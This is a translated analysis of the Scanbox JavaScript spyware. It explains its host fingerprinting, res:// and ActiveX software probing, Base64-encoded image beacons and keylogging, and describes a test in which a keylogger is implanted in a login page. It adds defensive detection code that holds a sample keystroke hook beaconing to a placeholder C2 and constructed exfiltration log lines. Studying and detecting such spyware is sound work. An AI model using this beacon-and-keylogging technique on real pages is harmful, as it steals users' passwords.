Javascript spyware script analysis: analysis and demonstration of Scanbox source code of Web malware

Source: Internet
Author: User

Scanbox is a malicious JavaScript script that collects information and logs keystrokes, and it targets Internet Explorer. Its functions include collecting basic host information, enumerating the applications installed on the host, obtaining the Flash version, obtaining the Office version, checking whether Adobe Reader is installed, and recording keystrokes.

Next, we analyze how each of these functions is implemented in the source code. Many Chinese technology sites have reposted reports about Scanbox, but few have analyzed or interpreted the source itself; the author eventually found this incomplete copy of the source (817 lines) on the personal blog of an overseas security researcher.

Program Framework

First, let's take a look at the program framework of the Scanbox script.

When the malicious script is injected into a web page and a user visits that page, the browser parses and runs the script locally. The program flow can be abstracted into the modules shown in Figure 1.

Collect basic information

Figure 2: The scanbox.info object records basic information from the current page header, as well as host information such as screen resolution, operating system, and language.

Encryption module

There is not much to say here: no Base64 library is imported, so the script uses a Base64 encoder implemented in plain JavaScript. Note that Base64 is an encoding, not encryption; it only obscures the transmitted data and does not protect it.

Communication Module

The communication module is implemented by two functions, a get function and a post function, corresponding to the two common HTTP request methods. These functions deliver the stolen information to the attacker's backend server. The get function creates an image object and issues a GET request by setting its src attribute. The post function creates a form, fills in its input elements, encrypts (Base64-encodes) the data, and calls submit() to issue a POST. Both are convenient ways for JavaScript to communicate with a backend.

Active reporting module


Similarly, an image object transmits data to the backend with the GET method, and the encryption module (Base64) is applied before the data is sent. The setInterval function sets a timer so that the script reports to the server at a fixed interval.

Plug-in Set

1. pluginid = 1

Plug-in 1 (pluginid = 1) obtains the list of software installed on the operating system by using the res:// protocol. res:// is a protocol predefined in Internet Explorer that can read the resources of any file in Win32 PE format, as shown in Figure 6 below:

Figure 6 shows a bitmap resource of assumer.exe opened with a resource editor tool. The same resource can also be accessed through Internet Explorer, as follows:

An image object is then created and its src attribute set to a res:// URL pointing at a resource inside a specific PE file. The image's onload and onerror events reveal whether the image loaded, which is equivalent to whether the res:// URL in the src attribute could be accessed, and therefore whether that particular application is installed on the victim host. For example:

However, Scanbox does not use this method. Instead, it creates an ActiveXObject("Microsoft.XMLDOM") object and has it parse an XML document that references the res:// URL. The XML string constructed before validateXML is called is shown in red:

Next, validateXML is called for the check. The principle is to create an ActiveXObject for parsing, match the error code it returns to determine whether the PE file accessed through the res:// protocol exists, and thereby determine whether the host has a specific application installed.

From the application list enumerated in the Scanbox source code, it is clear that Scanbox focuses on whether security software is installed on the host, which is important information for further attacks.

2. pluginid = 3

Plug-in 3 (pluginid = 3) determines the Flash version. It calls Flash-related ActiveXObject() objects to obtain the version.

3. pluginid = 5

Plug-in 5 (pluginid = 5) obtains the Office version. The principle is the same: create an ActiveXObject and read the version number from it.

4. pluginid = 6

Plug-in 6 (pluginid = 6) determines whether Adobe Reader is installed. The principle is the same as above.

5. pluginid = 21

This incomplete Scanbox source does not contain the keystroke-logging code, although the online reports focus mostly on that feature, so I added a keystroke-recording module following the plug-in calling convention used in Scanbox. Keystroke recording in JavaScript is well covered by existing code on the Internet, and the implementation is the same: it uses the document.onkeydown and document.onkeypress events, as follows:

Only the plug-ins present in the available Scanbox source are covered here. Judging from the plug-in numbering, many plug-ins are missing from this source, so the analysis can go no further than this.
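
The behaviours analysed above (res:// probing, the Microsoft.XMLDOM ActiveX object, keystroke hooks, image beacons, a hand-rolled Base64 alphabet and timer-based reporting) are also what a defender can look for in page scripts. The following is an added example, not code from Scanbox or from the original write-up: a static scorer that flags a script only when several of these indicators occur together. The indicator weights, thresholds and the two sample scripts are constructed for illustration.

```javascript
// Added example (not Scanbox code, not from the original write-up): a static
// heuristic that flags a script only when several of the behaviours analysed
// above appear together. Weights and samples are constructed for illustration.
const INDICATORS = [
  { name: 'res_protocol_probe', weight: 3, re: /res:\/\//i },
  { name: 'xmldom_activex', weight: 3,
    re: /ActiveXObject\s*\(\s*["']Microsoft\.XMLDOM["']\s*\)/i },
  { name: 'keystroke_hook', weight: 3,
    re: /\.\s*on(?:keydown|keypress|keyup)\s*=|addEventListener\s*\(\s*["']key(?:down|press|up)["']/i },
  { name: 'image_beacon', weight: 2, re: /new\s+Image\s*\([^)]*\)[\s\S]{0,200}?\.src\s*=/i },
  { name: 'form_autosubmit', weight: 1,
    re: /createElement\s*\(\s*["']form["']\s*\)[\s\S]{0,400}?\.submit\s*\(\s*\)/i },
  { name: 'base64_encode', weight: 1,
    re: /btoa\s*\(|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\+\// },
  { name: 'timer_reporting', weight: 1, re: /setInterval\s*\(/ },
];

// An Image pixel or a timer alone is common on benign pages; three or more
// indicators with a combined weight of 6 is what resembles the Scanbox pattern.
function scoreScript(source) {
  const matched = INDICATORS.filter((i) => i.re.test(source));
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  return { hits: matched.map((i) => i.name), score, suspicious: matched.length >= 3 && score >= 6 };
}

// Constructed samples (not captured scripts): a tracking pixel, and a
// non-functional sketch carrying the fingerprinting, key-hook and beacon tokens.
const BENIGN_SAMPLE = `
  var px = new Image(); px.src = "/pixel.gif?t=" + Date.now();
  setInterval(function () { heartbeat(); }, 60000);
`;
const SUSPICIOUS_SAMPLE = `
  var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  var probe = "res://EXAMPLE_APP_PATH.exe/1";
  var dom = new ActiveXObject("Microsoft.XMLDOM");
  document.onkeydown = function (e) { keys.push(e.keyCode); };
  setInterval(function () { var i = new Image(); i.src = C2 + "?d=" + enc(keys); }, 2000);
`;

console.log(scoreScript(BENIGN_SAMPLE).suspicious, scoreScript(SUSPICIOUS_SAMPLE).suspicious); // false true
```

The regexes are deliberately loose; in practice this kind of scorer is a triage filter over scraped page scripts, and a hit still needs a manual look at the script.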


Script test


If a website page has a stored XSS vulnerability, or Scanbox is implanted into a page containing a login form by other penetration means, serious consequences follow when a user loads that page. The password the user enters at login is sent back to the attacker's backend together with the keystroke listener's record, in plaintext.

I wrote several simple PHP scripts on the backend as the target for the data Scanbox sends back. They decode the Base64 and save the key records to a local txt file.

Next, we implant the Scanbox malicious script into the backend login page of a specific website and observe its behavior after the page loads.

As shown in the figure, the key records are written to a local file.
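
The reporting channel used in this test also leaves a trace on the network side: repeated GET requests for one image path from one client, spaced at the timer's interval, with Base64 in the query string. The following is an added example, not part of the original test setup, that looks for that pattern in constructed web-proxy log lines; the log format, hostnames, payload values and thresholds are all assumptions made for the example.

```javascript
// Added example, not part of the original analysis: flag Scanbox-style
// image beacons in web-proxy logs. A beacon repeats from one client to one
// path at a near-constant interval and carries Base64-decodable query data.
const SAMPLE_LOG = [ // constructed lines in the form "<ISO time> <client> <method> <url>"
  '2014-09-01T10:00:00Z 10.0.0.5 GET http://collector.example/i.gif?d=dXNlcjpwYXM=',
  '2014-09-01T10:00:02Z 10.0.0.5 GET http://collector.example/i.gif?d=c3dvcmQxMjM=',
  '2014-09-01T10:00:04Z 10.0.0.5 GET http://collector.example/i.gif?d=DQ==',
  '2014-09-01T10:00:06Z 10.0.0.5 GET http://collector.example/i.gif?d=YWRtaW4=',
  '2014-09-01T10:00:01Z 10.0.0.7 GET http://cdn.example/logo.png',
  '2014-09-01T10:03:11Z 10.0.0.7 GET http://cdn.example/logo.png',
];

const B64 = /^[A-Za-z0-9+/]+={0,2}$/;

// True if the value is well-formed Base64 that decodes to mostly printable text
// (keystroke buffers and form fields do; random tokens and hashes usually don't).
function decodesToText(value) {
  if (!B64.test(value) || value.length % 4 !== 0) return false;
  const text = Buffer.from(value, 'base64').toString('latin1');
  const printable = [...text].filter((c) => (c >= ' ' && c <= '~') || c === '\r' || c === '\n').length;
  return printable / text.length >= 0.9;
}

// Group GETs by client + URL path, then report groups with at least minHits
// requests, every one carrying a text-like payload, spaced within maxJitterSec.
function findBeacons(lines, { minHits = 3, maxJitterSec = 1 } = {}) {
  const groups = new Map();
  for (const line of lines) {
    const [time, client, method, url] = line.split(' ');
    if (method !== 'GET') continue;
    const u = new URL(url);
    const key = `${client} -> ${u.origin}${u.pathname}`;
    const payload = [...u.searchParams.values()].some(decodesToText);
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push({ t: Date.parse(time) / 1000, payload });
  }
  const findings = [];
  for (const [key, hits] of groups) {
    if (hits.length < minHits || !hits.every((h) => h.payload)) continue;
    hits.sort((a, b) => a.t - b.t);
    const gaps = hits.slice(1).map((h, i) => h.t - hits[i].t);
    if (Math.max(...gaps) - Math.min(...gaps) <= maxJitterSec) {
      findings.push({ key, hits: hits.length, intervalSec: gaps[0] });
    }
  }
  return findings;
}

console.log(findBeacons(SAMPLE_LOG)); // one finding: 10.0.0.5 -> http://collector.example/i.gif, 4 hits, 2 s apart
```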

Conclusion

In general, Scanbox is a malicious script executed on the client side. Its attack effect is limited by the browser's security configuration, but that does not diminish its powerful functions or the seriousness of its consequences. If attackers combine it with a stored XSS vulnerability to carry out a watering-hole attack, they can capture the user name and password entered at login, which poses an immeasurable risk to users' privacy and property.
